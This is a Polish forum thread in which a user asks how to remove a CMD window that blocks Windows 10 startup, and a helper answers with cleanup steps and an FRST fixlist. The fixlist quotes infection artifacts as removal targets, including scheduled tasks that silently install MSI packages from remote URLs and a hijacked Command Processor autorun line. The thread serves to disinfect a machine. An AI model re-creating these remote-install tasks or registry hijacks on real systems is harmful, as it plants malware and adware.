logo elektroda
logo elektroda
X
logo elektroda
REKLAMA
REKLAMA
Adblock/uBlockOrigin/AdGuard mogą powodować znikanie niektórych postów z powodu nowej reguły.

[Rozwiązano] Jak usunąć okienko CMD przy starcie Windows 10?

Darasekdaro 06 Lip 2019 11:00 1188 2
REKLAMA
  • #1 18047036
    Darasekdaro
    Poziom 2  
    Posty: 2
    Ocena: 1
    Witam, mam problem wyskakującego okna CMD podczas startu Windows 10, po pokazaniu się okienka rozruch zostaje zatrzymany. Nie wiem jak rozwiązać problem. Bardzo proszę o pomoc. Dodaję skany FRST. Dziękuje bardzo
    Załączniki:
    • FRST.txt (91.27 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (70.69 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • REKLAMA
  • Pomocny post
    #2 18047060
    Kolobos
    Spec od komputerów
    Posty: 85182
    Pomógł: 17174
    Ocena: 10460
    Uzyj AdwClenaer i usun to co wykryje.

    Zrob pelny skan przy pomocy mbam i rowniez usun to co wykryje.

    Zgraj zakladki z Chrome, profil utworzony przez infekcje zostanie usuniety.

    Odinstaluj:
    deskapp
    Intel Security True Key

    Wykonaj Fixlist.txt dla FRST:
    CloseProcesses:
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\ChromeHTML: -> <==== UWAGA
    ShellExecuteHooks: Brak nazwy - {BF96FB02-038E-11E7-B91B-64006A5CFC23} - -> Brak pliku
    ShortcutWithArgument: C:\Users\Darek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\user0 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=ChromeDefaultData
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
    AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
    IE trusted site: HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\webcompanion.com -> hxxp://webcompanion.com
    Hosts:
    HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
    (McAfee, Inc. -> McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\Run: [background_fault] => C:\Users\Darek\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software s.r.o. -> AVAST Software) <==== UWAGA
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\RunOnce: [Application Restart #2] => C:\Windows\SysWOW64\mshta.exe [13312 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [1454592 2018-10-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\RunOnce: [Application Restart #0] => C:\Windows\RTFTrack.exe [5052120 2015-06-01] (Realtek Semiconductor Corp -> Realtek semiconductor)
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\Policies\system: [Shell] <==== UWAGA
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\MountPoints2: {2b13b0fb-b673-11e8-9c48-f0761cf9a1bf} - "F:\HiSuiteDownLoader.exe"
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\MountPoints2: {efbd292e-e77a-11e8-9c51-a4c4945e89da} - "G:\setup.exe"
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\MountPoints2: {eff11dc7-e58d-11e8-9c4d-a4c4945e89da} - "F:\Setup.exe"
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\Winlogon: [Shell] %comspec% <==== UWAGA
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\Command Processor: @mode 20,5 & tasklist /FI "IMAGENAME eq SoundMixer.exe" 2>NUL | find /I /N "SoundMixer.exe">NUL && exit & if exist ( start /MIN "" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) <==== UWAGA
    HKU\S-1-5-18\...\Run: [] => [X]
    HKLM\...\Providers\ilhjoc0i: C:\Program Files (x86)\Shilidom Mapper\local64spl.dll [306688 2017-03-09] () [Brak podpisu cyfrowego] <==== UWAGA
    HKLM\Software\...\Authentication\Credential Providers: [{B7724AE5-1135-4889-8A5F-CA98BE6CA1ED}] -> C:\Program Files\TrueKey\McAfee.TrueKey.CredentialProvider.dll [2017-05-10] (McAfee, Inc. -> McAfee, Inc.)
    Lsa: [Notification Packages] scecli "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter"
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2019-07-06]
    ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (Brak pliku)
    Startup: C:\Users\Darek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Powiadomienia monitorowania tuszu - HP Photosmart 5510 series (sieć).lnk [2018-02-25]
    Startup: C:\Users\Darek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk [2018-08-26]
    ShortcutTarget: System.lnk -> C:\kfien5mkf\windows9.exe (Brak pliku)
    BootExecute: autocheck autochk * aswBoot.exe /M:2b0c31937 /dir:"c:\program files\avast software\avast"
    GroupPolicy: Ograniczenia ? <==== UWAGA
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA
    Task: {37F49111-3CD9-4CFA-B0D3-9DE46AC6C45B} - System32\Tasks\T0528 => "msiexec.exe" /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q <==== UWAGA
    Task: {4C2C2988-F0F7-41A9-922A-0C8B0A7FDE69} - System32\Tasks\{70DF9B8C-9F45-4758-A490-3C2852BBF2FC} => C:\WINDOWS\system32\pcalua.exe -a "C:\GOG Games\Transport Fever\unins000.exe"
    Task: {76A87EA7-5D50-48AF-A055-0F990C75687A} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
    Task: {A8B2171C-01F1-47FD-AC4D-6BA6BDDFBAF8} - System32\Tasks\{F8495C84-11AF-4158-884D-2EB723DA8DB8} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\SEGA\Children of the Nile\CotN.exe" -d "C:\Program Files (x86)\SEGA\Children of the Nile"
    Task: {A91736BA-E4F1-49C7-9070-242566A286F0} - System32\Tasks\Update Manager => C:\Users\Darek\AppData\Roaming\Stronghold.3.Gold.Edition.v1.12.1.Incl.6DLC-ALI213\Upgrade.exe
    Task: {DAA5F85D-67D5-43D4-9571-9EB1664AE910} - System32\Tasks\{C545CD82-3FA6-408E-8617-D57B3598EBEC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Mount&Blade Warband\mb_warband.exe" -d "C:\Program Files (x86)\Mount&Blade Warband"
    Task: {DDE37EFA-00A7-4BC0-BFA9-0422A32EBA64} - System32\Tasks\Vasagohok => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY&v=201739 /q <==== UWAGA
    Task: {FF8877C3-722E-4616-9784-61F547220868} - System32\Tasks\SystemMaintanceTask => C:\Users\Darek\AppData\Roaming\Anno.2205.Gold.Edition.Repack\blfkxgtg.exe
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131542081177946466&GUID=6C09EA77-0060-4908-90D8-7801AB4F8722
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491912222&z=412374922cd8d279d037609gdz1tdg1t9gfoeo3g9c&from=che0812&uid=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491912222&z=412374922cd8d279d037609gdz1tdg1t9gfoeo3g9c&from=che0812&uid=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491912222&z=412374922cd8d279d037609gdz1tdg1t9gfoeo3g9c&from=che0812&uid=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY&q={searchTerms}
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.global-pl.com/
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1491912222&z=412374922cd8d279d037609gdz1tdg1t9gfoeo3g9c&from=che0812&uid=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
    SearchScopes: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> DefaultScope {06651016-6D44-4AB1-8648-82FE3528D0AB} URL = hxxp://www.global-pl.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> {06651016-6D44-4AB1-8648-82FE3528D0AB} URL = hxxp://www.global-pl.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491912222&z=412374922cd8d279d037609gdz1tdg1t9gfoeo3g9c&from=che0812&uid=WDCXWD10S21X-24R1BT0-SSHD-8GB_WD-WX61A65HEHXYHEHXY&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://pl.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10454__180526__yaie&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B1B962028-7062-4EA2-9FC2-1514561EC507%7D&gp=832418
    BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-05-17] (McAfee, Inc. -> Intel Security)
    BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-05-17] (McAfee, Inc. -> Intel Security)
    Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-05-17] (McAfee, Inc. -> Intel Security)
    Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2017-05-17] (McAfee, Inc. -> Intel Security)
    Toolbar: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie64.dll [2017-05-17] (McAfee, Inc. -> Intel Security)
    Edge HomeButtonPage: HKU\S-1-5-21-218257444-867172819-4211311372-1001 -> hxxp://www.global-pl.com/
    FF Homepage: Mozilla\Firefox\Profiles\4q99baiy.default -> hxxp://www.global-pl.com/
    CHR DefaultProfile: ChromeDefaultData
    CHR HomePage: ChromeDefaultData -> inline.go.mail.ru
    CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.pl/"
    CHR DefaultSearchURL: ChromeDefaultData -> hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=E210PL91105G0&p={searchTerms}
    CHR DefaultSearchKeyword: ChromeDefaultData -> mcafee
    CHR Profile: C:\Users\Darek\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2019-07-06] <==== UWAGA
    CHR Extension: (System Table) - C:\Users\Darek\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2018-06-13]
    CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <nie znaleziono>
    CHR HKLM-x32\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lhemechcanjmilllmccjbjldonmnnjjj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx <nie znaleziono>
    CHR HKLM-x32\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-218257444-867172819-4211311372-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Baglook\Application\chrome.exe <==== UWAGA
    S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd) <==== UWAGA
    S2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [998296 2017-05-10] (McAfee, Inc. -> McAfee, Inc.)
    S2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16160 2017-05-10] (McAfee, Inc. -> McAfee, Inc.)
    R2 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86776 2017-05-10] (McAfee, Inc. -> McAfee, Inc.)
    R1 wfdrvr_vw_1_10_0_28; C:\WINDOWS\System32\drivers\wfdrvr_vw_1_10_0_28.sys [57712 2015-10-30] (WordFly -> WF)
    R2 WinDivert1.2; C:\WINDOWS\system32\drivers\WinDivert64.sys [37552 2018-06-13] (Nemea Mjukvaruutveckling AB -> Basil)
    2019-01-28 18:36 - 2019-01-28 18:36 - 000000000 _____ () C:\Users\Darek\AppData\Roaming\FC29FA0894FE.ini
    2018-10-13 09:41 - 2018-10-13 09:41 - 004712448 _____ (SoundMixer) C:\Users\Darek\AppData\Roaming\Launcher_01.exe
    2019-02-28 21:33 - 2019-02-28 21:33 - 003358208 _____ () C:\Users\Darek\AppData\Roaming\Launcher_08.exe
  • #3 18047248
    Darasekdaro
    Poziom 2  
    Posty: 2
    Ocena: 1
    Problem rozwiązany, dziękuję bardzo za pomoc, zamykam temat

    Dodano po 55 [sekundy]:

    Zastosowałem się do wszystkich polecen
REKLAMA